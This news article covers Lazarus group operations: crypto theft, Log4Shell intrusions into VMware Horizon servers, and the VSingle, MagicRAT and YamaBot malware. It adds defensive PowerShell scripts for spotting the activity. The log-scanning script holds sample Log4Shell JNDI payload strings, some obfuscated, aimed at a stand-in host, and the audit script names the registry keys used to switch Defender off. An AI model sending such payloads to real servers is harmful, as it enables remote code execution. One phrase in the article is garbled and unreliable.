FBI Seized $30 Million Stolen Crypto
Lazarus (APT38), the notorious hacking group from North Korea, has featured prominently on dark web news portals lately. The APT is responsible for the recent hack of the Axie Infinity platform, in which $620 million in cryptocurrency was stolen. However, with the support of the FBI and other law enforcement agencies, $30 million of the stolen funds was recovered from the criminals' wallets.
Now, with their latest cyber espionage scheme, the North Korean state-sponsored hackers have unleashed a massive hacking campaign against US companies. The threat actors have been traced to compromised VMware servers, which they are using to infiltrate companies in the energy sector. According to threat analysis reports, the targeted energy networks are located mostly in the United States, Canada, and Japan.
Lazarus is no stranger to creating havoc on a global level; the group has been on the radar for over a decade. These hackers, sponsored by Kim Jong Un's government, have been the main protagonists in hundreds of sophisticated attacks launched on global entities.
The past ten years have seen Lazarus evolve. Its notorious accomplishments include hijacking and stealing private data files from corporations, and it has also been involved in espionage against countries deemed North Korea's enemies. But its latest activities have greatly enriched Kim Jong Un's regime: the group has added ransomware and cryptocurrency theft campaigns to its hacking resume.
Additionally, according to cyber analysts, the prolific hacking group has amassed an enormous fortune from its illegal activities. It is reported that Lucifer's threat actors' entrepreneurial conglomerate includes the harmful "VSingle" and "YamaBot" malware. They have also been linked to "MagicRAT", a remote access trojan that allows the hackers to remotely access and steal data from infected machines.
Lazarus Assault Arsenal
Cyber researchers at ASEC and Symantec revealed that they had tracked the North Korean hackers to recent intrusions committed in April and May. Another analytical report, issued by Cisco, revealed further information about other cyber attacks carried out by these threat actors.
So far, the various tactics used by the highly skilled dark web gang demonstrate their adaptability across hacking methods. Lazarus is known for exploiting the Log4Shell vulnerability, typically on internet-exposed VMware Horizon servers. By injecting reverse-shell commands through that flaw, they are able to execute arbitrary commands on vulnerable endpoints.
Additionally, in the initial stage, the hackers disabled Windows Defender while deploying their VSingle backdoor. This was done by altering registry keys with WMIC and PowerShell scripts that run alongside the VMware Horizon files.
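For defenders looking for the Log4Shell activity described above, the first place to look is the request logs of the exposed server, where the `${jndi:` lookup string (often obfuscated with nested `${lower:}` / `${upper:}` lookups, `${::-x}` default-value tricks, or URL encoding) appears in headers or parameters. The following PowerShell script is an added example written for this page, not code from the article or from the researchers it cites. The log lines are constructed for illustration, and the path in the final comment is a placeholder to be replaced with the real Horizon or web-server log location.

```powershell
# Added example: flag request lines carrying a JNDI lookup, after undoing
# the common obfuscations. Sample lines below are constructed, not real traffic.

function Test-Log4ShellIndicator {
    param([string]$Line)
    # Undo one layer of URL encoding so %24%7B becomes ${
    $s = [System.Uri]::UnescapeDataString($Line)
    $pattern = '\$\{\s*jndi\s*:'
    # Check, then peel one obfuscation layer, until nothing changes.
    # Checking before each rewrite avoids losing a match if the ${...:-x}
    # rewrite happens to swallow part of a real lookup.
    do {
        if ([regex]::IsMatch($s, $pattern, 'IgnoreCase')) { return $true }
        $before = $s
        # ${lower:j} / ${upper:j} resolve to the single character inside
        $s = [regex]::Replace($s, '\$\{(?:lower|upper):([^{}])\}', '$1', 'IgnoreCase')
        # ${anything:-j} (undefined lookup with default value) resolves to j
        $s = [regex]::Replace($s, '\$\{[^{}]*:-([^{}])\}', '$1')
    } while ($s -ne $before)
    return $false
}

# Constructed sample access-log lines: one benign, three carrying lookups
$sampleLines = @(
    '10.0.0.5 - - [01/May/2022:10:00:01] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/May/2022:10:00:02] "GET /broker/xml HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [01/May/2022:10:00:03] "GET /broker/xml HTTP/1.1" 200 "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.9 - - [01/May/2022:10:00:04] "GET /broker/xml HTTP/1.1" 200 "%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fc%7D"'
)

$hits = $sampleLines | Where-Object { Test-Log4ShellIndicator $_ }
$hits | ForEach-Object { Write-Output "LOG4SHELL-INDICATOR: $_" }
Write-Output ("{0} of {1} sample lines flagged" -f @($hits).Count, $sampleLines.Count)

# Against real logs (placeholder path, adjust to your Horizon/web-server log dir):
# Get-Content '<path-to-log-dir>\*.log' | Where-Object { Test-Log4ShellIndicator $_ }
```

The script flags the three constructed malicious lines and not the benign one. It is deliberately a broad net: the `${jndi:` string has no legitimate reason to appear in a request header, so any hit is worth investigating, and an exposed Horizon instance that has not been patched for Log4Shell should be treated as compromised until proven otherwise regardless of what the logs show.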
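Because the intrusion chain above begins by switching Windows Defender off through registry policy keys, a quick audit of those keys and of Defender's live state is a useful triage step on any Horizon host. The script below is an added example for this page, not code from the article; it reads the documented Defender policy values under `HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender` and the output of the built-in `Get-MpComputerStatus` and `Get-MpPreference` cmdlets, and must be run in an elevated PowerShell session.

```powershell
# Added example: report signs that Defender has been turned off or weakened
# through policy registry keys or preferences. Run elevated.

function Get-DefenderTamperFindings {
    $findings = @()

    # Policy values that, when set to 1, disable Defender components.
    # These are the documented Group Policy registry locations.
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $checks = @(
        @{ Path = $policyRoot;                            Name = 'DisableAntiSpyware' },
        @{ Path = "$policyRoot\Real-Time Protection";     Name = 'DisableRealtimeMonitoring' },
        @{ Path = "$policyRoot\Real-Time Protection";     Name = 'DisableBehaviorMonitoring' },
        @{ Path = "$policyRoot\Real-Time Protection";     Name = 'DisableOnAccessProtection' }
    )
    foreach ($c in $checks) {
        $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
        if ($null -ne $item -and $item.($c.Name) -eq 1) {
            $findings += "Registry: $($c.Path)\$($c.Name) = 1"
        }
    }

    # Live state as reported by the Defender module
    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($status) {
        if (-not $status.AntivirusEnabled)           { $findings += 'Antivirus engine is disabled' }
        if (-not $status.RealTimeProtectionEnabled)  { $findings += 'Real-time protection is off' }
        if (-not $status.BehaviorMonitorEnabled)     { $findings += 'Behavior monitoring is off' }
        if (-not $status.IsTamperProtected)          { $findings += 'Tamper Protection is off' }
    } else {
        $findings += 'Get-MpComputerStatus returned nothing (Defender service absent or stopped?)'
    }

    # Broad exclusions are another common way to let a payload run unscanned
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref -and $pref.ExclusionPath) {
        $findings += "Exclusion paths present: $($pref.ExclusionPath -join ', ')"
    }
    if ($pref -and $pref.ExclusionProcess) {
        $findings += "Process exclusions present: $($pref.ExclusionProcess -join ', ')"
    }

    return $findings
}

$results = Get-DefenderTamperFindings
if ($results.Count -eq 0) {
    Write-Output 'No Defender tampering indicators found'
} else {
    $results | ForEach-Object { Write-Output "FINDING: $_" }
}
```

A clean result from this script does not clear the host: it only shows that Defender is on now. Pair it with a look at the change history, for example process-creation events (Security event ID 4688 when command-line auditing is enabled) showing `wmic`, `reg.exe` or `powershell.exe` launched from the Horizon service account, which is where the WMIC and PowerShell activity described in the article would surface.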
In the second scenario, once VSingle has established a foothold on a new victim, the hackers drop the MagicRAT trojan, which allows them to steal private data remotely. In the third variant, the YamaBot malware, which also has RAT features, is used to copy directories and files from their victims.
YamaBot has a plethora of functions: it can transmit details about the compromised host to its C2 server, steal data files remotely, and run commands on the targeted computer networks. Above all, it can self-destruct and wipe its footprints from the infiltrated system.
Diversity is what makes the Lazarus hacking group so dangerous; its attack chain goes beyond malware payloads. Credential-harvesting strategies and proxy-tunnelling tools are also part of the Lazarus hackers' devastating arsenal.